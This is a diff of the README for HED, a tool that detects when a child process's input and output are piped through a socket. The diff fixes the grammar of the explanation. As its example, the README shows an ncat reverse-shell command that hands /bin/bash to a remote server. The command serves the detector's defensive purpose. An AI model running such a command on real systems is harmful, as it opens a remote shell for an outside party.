fervagar/HED/README.md

 	<img alt="Logo" src="./doc/HEDLogo.png" height="220" width="220">
  </p>

 HED is a tool developed for detecting when an "engage" is performed.
 What is an engage?
-Well... we are refer as "engage" to the procedure of multiplexing the input & output of a child process through a socket.
+Well... we refer as "engage" to the procedure of multiplexing the input & output of a child process through a socket.
 For example: if you execute the following command:

 	ncat server port -e /bin/bash